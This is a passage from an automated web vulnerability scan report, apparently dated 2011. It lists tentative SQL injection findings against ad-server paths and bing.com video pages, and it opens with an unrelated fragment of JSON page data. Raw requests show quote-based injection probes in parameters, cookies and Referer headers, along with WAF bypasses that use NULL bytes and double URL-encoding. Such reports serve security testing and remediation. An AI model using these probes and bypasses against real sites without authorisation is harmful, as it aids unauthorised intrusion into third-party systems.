downs","caption":"","credits":"TODAYshow.com","label":"Timeline","content":{"flashvars":{"omnitureInstanceName":"SheenTime","dataId":"CharlieSheen_timeline","_w":"1000","_h":"640"},"embedParams":{"width":"1000","height":"640","play":"true","loop":"true","menu":"false","quality":"Best","scale":"showall","salign":"tl","wmode":"opaque","bgcolor":"#FFFFFF","allowfullscreen":"true","allowscriptaccess":"always","allownetworking":"all"},"uri":"http://msnbcmedia.redacted/i/MSNBC/Components/Interactives/_templates/Timeline/timeline_template.swf","width":1000,"height":640,"typeName":"FlashInteractive","RenderAuthority":"-1075847510","ItemIndex":0},"archiveUri":"http://today.msnbc.redacted/id/41320098/ns/today-entertainment/","workbenchId":41320787,"typeName":"Interactive","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"InteractiveSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"bridge":[{"workbenchId":35313411,"headline":"Talent and troubles follow Charlie Sheen","totalSlides":32,"firstSlide":{"headline":"WOLVERINES!","caption":"Charlie Sheen, born Carlos Estevez, got his movie start in 1984\u0027s 
\"Red Dawn.\" His fellow young stars included Patrick Swayze, C. Thomas Howell, Lea Thompson and Jennifer Grey.&#160;(MGM)","src":"http://msnbcmedia4.msn.com/j/MSNBC/Components/Slideshows/_production/ss-10020
...[SNIP]...

1.94. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/139941180/direct

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/139941180/direct?1'=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 4790
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:49 GMT
Connection: close

<!--#WIDTH=728 #HEIGHT=90 #CREATIVETYPEID=4 #DELIVERYMETHODID=2-->
<html>
<head>
<title>HealthyMinerals_728x90_Iframe_Homepage</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQ
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/139941180/direct?1''=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 199
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:50 GMT
Connection: close

<script language="JavaScript"
class="adsvelocity_728x90"
src="http://media.adsvelocity.com/ad/24.js?click=http://clk.atdmt.com/go/139941180/direct;ai.198084592.198090580;ct.1/01?href=""></script>

1.95. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The ;wi.728;hi.90/01?click parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;wi.728;hi.90/01?click parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=' HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7022
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:07 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click='' HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:08 GMT

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.96. http://redcated/APM/iview/148848786/direct [AA002 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The AA002 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the AA002 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6607
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:10 GMT

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607%00''; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:09 GMT

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.97. http://redcated/APM/iview/148848786/direct [MUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6497
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:57:20 GMT
Connection: close

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1196
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:57:21 GMT
Connection: close

<!--/* viacomgames - 728/-->
<iframe id='a2af6744' name='a2af6744' src='http://ads01.maxcdn.com/afr.php?zoneid=168&amp;cb=INSERT_RANDOM_NUMBER_HERE' frameborder='0' scrolling='no' width='728' height=
...[SNIP]...

1.98. http://redcated/APM/iview/148848786/direct [MUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%00'

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7015
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:11 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%00''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 260
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:12 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/189252332.194920818/148848786/direct;wi.728;hi.90/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.atdmt
...[SNIP]...

1.99. http://redcated/APM/iview/148848786/direct [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /APM%2527/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6905
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:12 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM%2527%2527/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1416
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:12 GMT
Connection: close

<SCRIPT Language="Javascript">
var MPcode = "12760-79049-27909-2";
var MPwidth = "728";
var MPheight = "90";
var randNum = Math.floor(Math.random() * 10000000);
var iframesrc = "http://altfarm.me
...[SNIP]...

1.100. http://redcated/APM/iview/148848786/direct [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6417
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:10 GMT
Connection: close

<html><head><title>IntelligentSource 728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:10 GMT
Connection: close

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.101. http://redcated/APM/iview/148848786/direct [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6905
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:08 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1196
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:08 GMT
Connection: close

<!--/* viacomgames - 728/-->
<iframe id='a2af6744' name='a2af6744' src='http://ads01.maxcdn.com/afr.php?zoneid=168&amp;cb=INSERT_RANDOM_NUMBER_HERE' frameborder='0' scrolling='no' width='728' height=
...[SNIP]...

1.102. http://www.bing.com/videos/browse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /videos/browse?mkt=en-us&vid=&1'=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16381
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:36 GMT
Connection: close
Set-Cookie: _SS=SID=B5E542B562A145F58CA0A9C7486B5C3B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:35 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c826dfb78d1ca415c8566199353a558d2; expires=Mon, 28-Jan-2013 23:52:35 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:35 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/browse?mkt=en-us&vid=&1''=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16453
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:36 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=890958F038CD487AB2C504C4D7322DEA; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:36 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccf8ccbc4ec1244db9510910d7cb4667f; expires=Mon, 28-Jan-2013 23:52:36 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:36 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.103. http://www.bing.com/videos/results.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16345
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:06 GMT
Connection: close
Set-Cookie: _SS=SID=A43EDFE5938C41E59E291377E160BE27; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9e46db61c3b34eb9ad767d83ac45b8ba; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
